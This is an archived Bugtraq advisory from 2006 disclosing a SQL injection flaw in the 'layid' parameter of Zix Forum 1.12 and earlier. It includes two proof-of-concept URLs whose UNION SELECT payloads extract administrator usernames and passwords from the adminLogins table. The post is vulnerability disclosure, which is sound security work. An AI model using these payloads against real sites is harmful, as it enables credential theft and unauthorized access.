Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
From: i6d@xxxxxxxxxxx
Date: 20 May 2006 12:34:25 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised 
before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in 
clear text .


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins
 where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins
 where approve=1 and '1'='1'

-------

By PHP Emperor

# i6d[at]hotmail[dot]com

Prev by Date: cPanel OpenBaseDir Bypass
Next by Date: Re: XSS in orkut.com
Previous by thread: cPanel OpenBaseDir Bypass
Next by thread: Re: Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Index(es):
- Date
- Thread